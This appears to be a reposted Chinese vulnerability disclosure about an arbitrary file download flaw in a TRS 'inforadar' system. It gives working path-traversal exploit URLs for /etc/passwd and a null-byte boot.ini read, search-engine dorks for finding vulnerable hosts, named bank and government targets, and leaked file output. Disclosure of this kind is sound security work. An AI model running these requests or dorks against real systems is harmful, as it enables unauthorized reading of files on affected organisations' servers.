trs某系统任意文件下载漏洞第二弹

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 感觉挺严重的问题,存在的地方包括但是不局限银行、政府等行业。 ### 详细说明: exp inforadar/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd exp2 http://inforadar.trs.com.cn/jsp/util/file_download.jsp?filePath=c:%5Cboot.ini%00.xml 官方网站需要加个截断,就可以了 应该是神马雷达系统。 很多地方都有这问题。 但是google找不到多少个,因为很多都是二次开发,目录明改变了。 比如招行。。。 [WooYun: 招商银行某系统任意文件下载漏洞](http://www.wooyun.org/bugs/wooyun-2013-040001) google http://203.208.46.145/#newwindow=1&q=intitle:trs+inurl:inforadar&start=10 http://203.208.46.145/#filter=0&newwindow=1&q=inurl:jsp/portalsearch baidu http://www.baidu.com/s?wd=inurl%3Ainforadar&rsv_spt=1&issp=1&rsv_bp=0&ie=utf-8&tn=baiduhome_pg&rsv_sug3=13&rsv_sug=0&rsv_sug1=12&rsv_sug4=777 ### 漏洞证明: [WooYun: 招商银行某系统任意文件下载漏洞](http://www.wooyun.org/bugs/wooyun-2013-040001) [WooYun: 福建省人民政府某系统任意文件下载漏洞](http://www.wooyun.org/bugs/wooyun-2013-040003) trs官方 ``` [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息